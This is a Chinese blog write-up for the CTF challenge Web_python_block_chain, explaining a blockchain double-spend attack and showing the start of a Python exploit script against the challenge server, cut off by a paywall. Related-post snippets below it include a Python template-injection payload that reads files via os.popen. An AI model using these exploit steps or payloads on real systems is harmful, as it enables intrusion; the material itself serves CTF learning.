攻防世界 WEB Web_python_block_chain

最新推荐文章于 2024-05-26 18:18:15 发布
最新推荐文章于 2024-05-26 18:18:15 发布
阅读量6.2k 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41696858/article/details/120303398
版权

这题是区块链题,对区块链不是很了解,想了解原理的建议看这一篇
https://blog.youkuaiyun.com/hxhxhxhxx/article/details/108111692
简单介绍一下双花攻击的原理吧,就是区块链是去中心化账本,而且默认长度最长的是主链
如果用户自持有的账本长度大于中心化中心的账本,那么所有的节点都会以当前用户的账本覆盖当前持有的账本,这边是0确认,
就是整个链里就你一个人,所以没有人跟你竞争,所以一定会成功。具体的也不清楚,直接看大佬的脚本吧
具体要改的就是url的三个参数和三个addr
简单演示一下

# -*- encoding: utf-8 -*-
# written in python 2.7
import hashlib, json, rsa, uuid, os,requests,re

# 一堆变量常量

url_root="http://111.200.241.244:52910/"
url_create="http://111.200.241.244:52910/create_transaction"
url_flag="http://111.200.241.244:52910/flag"

s=requests.Session()
ddcoin = s.get(url=url_root)

prev_one=re.search(r"hash of genesis block: ([0-9a-f]{64})",ddcoin.content, flags=0).group(1)
bank_utox_id=re.search(r"\"input\": \[\"([0-9a-f\-]{36})",ddcoin.content, flags=0).group(1)
bank_signature=re.search(r"\"signature\": \[\"([0-9a-f]{96})",ddcoin.content, flags=0).group(1)

DIFFICULTY = int('00000' + 'f' * 59, 16)
EMPTY_HASH = '0'*64

bank_addr="83c1ec7b05a19528bc5520ede1b11c0faf92bc11187497c98a034473aa35c58263026587e4e8bde66bc95437fd73c06b"
hacke_addr="8b70905e184624c3078ba496a9b35ba5a1c5c79f296dfe45c13ff4b9df98b41c064bd810ffc0a230aae8f3d0514053a5"
shop_addr="90a6e1e67
最低0.47元/天 解锁文章
[系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
杨秀璋的专栏
12-30 5433
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口。这篇文章将详细讲解SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制,利用的端口
攻防世界--Web_python_block_chain
qq_46263951的博客
01-21 1万+
通过这道题对区块链有了一个简单的了解,这道题主要是参考师傅们的wp,所以这里就不再赘述,主要讲一下自己的收获。 这道题利用的是双花攻击中的51% attack。51% attack指的是攻击者如果可以拥有超过全网50%的算力,就可以创造一条高度大于原始链的链,攻击者可以发送一个新的块到这条链上。 这里使用的为0确认,就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。而6确认就是需要经过6个人(区块被挖出)交易才确定。 区块链的规则:当出现分叉时,
攻防世界 web高手进阶区 8分题 Web_python_block_chain
闵行小鱼塘
10-03 1643
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是Web_python_block_chain的writeup
[攻防世界]-WEB高手进阶区-Web_python_block_chain
爱国小白帽
10-02 866
Poc 已给出,只需更改 ip 和三个 addr # -*- encoding: utf-8 -*- # written in python 2.7 import hashlib, json, rsa, uuid, os,requests,re # 一堆变量常量 url_root="http://220.249.52.133:39176/" url_create="http://220.249.52.133:39176/create_transaction" url_flag="http://220.
攻防世界web进阶区Web_python_block_chain详解
hxhxhxhxx的博客
08-19 4509
攻防世界web进阶区Web_python_block_chain详解题目详解51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been restarted at 21: 45 04 / 17.All blockchain have been reset.View source code hash of genesis block: 1787809bc3d510a8137f05be51aca5b4597112339cd51f819ccd979372ef3
CTF之Web_python_block_chain
最新发布
qq_74263993的博客
05-26 1194
然后再看看这里的51% 攻击,其实这里说的51%是指算力,也就是这种攻击需要攻击者具备全网51%的算力,因为这样才有机会使自己生成(挖出)区块的速度超过其他人,然后按区块链的规则:当出现分叉时,区块链的规则认最长的分链为主链,并舍去原有的链,就达到了撤销原来链上已经存在的交易,拿回该交易使用了的钱的目的,这里我的另一个理解就是可以使交易回滚,从而追回被盗的钱。0确认就同样的道理了,那就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。
blockchain
04-05
python开发简单的区块链集群 区块链是分布式数据存储、点对点传输、共识机制、加密算法等计算机技术的新型应用模式。所谓共识机制是区块链系统中实现不同节点之间建立信任、获取权益的数学算法。
攻防世界高手进阶区通关教程(2)
玄道的网安博客
05-16 2889
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
【AT91SAM7X256_128网络安全实战】:加密通信与访问控制的终极武器
# 摘要 本文详细探讨了AT91SAM7X256/128微控制器在网络安全领域的应用与实践,涵盖了微控制器基础、网络安全理论、加密通信实现、访问控制策略,以及实战案例分析等多个方面。通过深入分析加密技术、访问控制机制、...
Python-blockchain开源教程从零开始写区块链
08-10
blockchain 开源教程:从零开始写区块链
攻防世界(web高手进阶区)——32~44题
weixin_43610673的博客
08-04 2958
题号会变动可能不太一样 目录Web_php_wrong_nginx_configCommentZhuanxvWeb_python_block_chainics-02love_mathWeb_python_flask_sql_injection/register路由/edit_profile路由FilemanagerBilibiliSmartyTriangleTimeKeepereasylaravel Web_php_wrong_nginx_config 直接尝试登录,另修改isLogin=1 无效 有r
Python构建区块链
majiayu000的博客
11-25 3957
区块链是在计算机网络的节点之间共享数据的分类账(分布式数据库)。作为数据库,区块链以电子格式储存信息。区块链的创新之处在于它保证了数据记录的安全性和真实性,可信性(不需要没有可信任的第三方)。区块链和典型数据库的区别是数据结构。区块链以block的方式收集信息。
blockchain-python-tutorial搭建出坑记
AlexLJM的专栏
05-17 991
国外大神开发了一个python版本的区块链实验环境,于是想也搭建下看看,github上环境准备介绍的很简单,但实际搭建时坑很多,解决方法记录如下:github地址:https://github.com/adilmoujahid/blockchain-python-tutorial1. 需要python3.6,这个没啥好说的,但是运行python blockchain.py -p 5000,会提示缺...
50行python代码实现的小区块链
热门推荐
神棍之路
08-25 7万+
import hashlib as hasher import datetime as date # Define what a Snakecoin block is class Block: def __init__(self, index, timestamp, data, previous_hash): self.index = index se
攻防世界web进阶区之Web_python_template_injection
qq_45756971的博客
07-16 306
点开题目所给链接:我们通过 {{1+1}} 判断了它存在phthon模块注入:通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。 我们可以借用 os.popen来读取我们想要的flag文件里的信息 构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘
BlockChainPython一步一步实现(流程最清楚)区块链底层技术流程图(理解一目了然,值得收藏)
头部AI社区如有邀博主AI主题演讲请私信—心比天高,仗剑走天涯,保持热爱,奔赴向梦想!低调,专注,谦虚,自律,反思,成长,还算比较正能量的博主,公益免费传播…内心特别想在AI界做出一些可以推进历史进程影响力的技术(兴趣使然,有点小情怀,也有点使命感呀
04-08 1万+
BlockChainPython一步一步实现(流程最清楚)区块链底层技术流程图(理解一目了然,值得收藏) 导读 基于Python编程,实现一步一步实现(流程最清楚)区块链底层技术流程图,理解一目了然,值得收藏。 目录 设计思路 实现代码 设计思路 实现代码 # -*- coding: utf-8 -*- ''' Create...
攻防世界web进阶之Web_python_template_injection
胖虎很忙
10-11 3670
(1)简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令, (2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置; (3)读取passwd信息 {{ [].class.base.subc...
攻防世界 WEB easy_laravel
qq_41696858的博客
02-06 3708
这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议把源码下下来,自己搭个环境慢慢看,不然不方便。那就看源码呗,先看路由,mvc的入口点 哦对了先说一下,larvel是一个PHP的web框架 在一个个尝试路
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值